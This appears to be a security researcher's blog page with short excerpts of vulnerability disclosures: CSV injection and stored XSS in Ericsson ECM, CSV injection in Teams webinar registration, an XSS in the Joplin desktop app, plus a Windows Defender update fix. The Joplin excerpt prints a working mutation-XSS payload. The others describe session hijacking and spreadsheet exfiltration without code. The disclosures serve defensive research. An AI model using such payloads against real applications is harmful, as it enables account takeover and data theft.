Info Sec & Developers Blog

Dear Reader, I was able to identify CSV Injection in Ericsson ECM (Enterprise Content Management) solution Version: 18.0 (0331) R1E  CVE ID:  CVE-2021-41390 Below are its details: # Software description: Ericsson Catalog Manager allows customers to rapidly launch and enable new innovative offerings with simple user experience and enterprise product, service & resource catalog capabilities.  # Technical Details & Impact: It was observed that Security Provider Endpoint in User Profile Management Section is vulnerable to CSV Injection , using CSV injection; Maliciously crafted formulas can be used for three key attacks: Hijacking the user's computer by exploiting vulnerabilities in the spreadsheet software, such as CVE-2014-3524. Hijacking the user's computer by exploiting the user's tendency to ignore security warnings in spreadsheets that they downloaded from their own website. Exfiltrating contents from the spreadsheet, or other open spreadsheets. # POC Lo...

 Dear Reader, I was able to identify stored XSS in  Ericsson ECM (Enterprise Content Management) solution Version: 18.0 (0331) R1E  CVE ID: CVE-2021-41391 Below are its details: # Software description: Ericsson Catalog Manager allows customers to rapidly launch and enable new innovative offerings with simple user experience and enterprise product, service & resource catalog capabilities.  # Technical Details & Impact: It was observed that Security Management  Endpoint in User Profile Management  Section is vulnerable to stored XSS, In most test cases session hijacking was also possible by utilizing the XSS vulnerability. This potentially allows for full account takeover, or exploiting admin's browsers using beef framework. # POC Login as normal user in ECM  Click on User Profile Management and click on Preference Definition or just visit this URL "https://host:port/ecm/securityManagement " change the host/port to your ECM host/...

 Dear reader, While testing different features of TEAMS, I find out a CSV injection vulnerability in TEAMS Webinar feature, where any external user, or attacker can register himself for attending public webinar and in webinar registration page he can inject a malicious payload which will executed once the admin download the attendees list. As per Microsoft they are not accepting it as high/medium security bug (which I totally Disagree) and not eligible for bounty or hall of fame, also they provided the permission to disclose this publicly.  As per Microsoft the admin has to click enable button once he open the report. For which I mentioned them multiple times that admin will always trust the report as its coming from Trusted source which in this case is Microsoft and 95% of times he will click on Enable button and payload will be executed. Anyways lets start with the Vulnerability details, At the end of this document I will give a bonus trick on how to find publicly available ...

Today while updating my Windows defender to latest version, I was facing below Issue and it was not updating to latest version and showing error code 0x80070643  multiple retried and troubleshoot were performed but nothing helped.  Later I found below commands which help to update defender using command prompt. cd %ProgramFiles%\Windows Defender MpCmdRun.exe -removedefinitions -dynamicsignatures MpCmdRun.exe -SignatureUpdate and it fixed the issue.

Dear Reader Jubair Rehman Yousafzai Here: Update Sept 2022: CVE assigned CVE-2021-33295 https://www.cvedetails.com/cve/CVE-2021-33295/ During the testing of Joplin App Desktop Version before 1.8.5 I was able to execute the malicious XSS when entered in Main body of Joplin App Desktop,  Once I click on Toggle button twice, the payload was executed successfully. The payload which I have used for this testing is as below <noscript><p title="</noscript><img src=x onerror=alert('testing')>">  Below is the POC for this exploit   After reporting to the Joplin team they fixed the issue directly and released the fixed in 1.8.5 version.  Below are their release notes and details:   https://github.com/laurent22/joplin/releases/tag/v1.8.5   Thanks Jubair Rehman: https://twitter.com/jubairfolder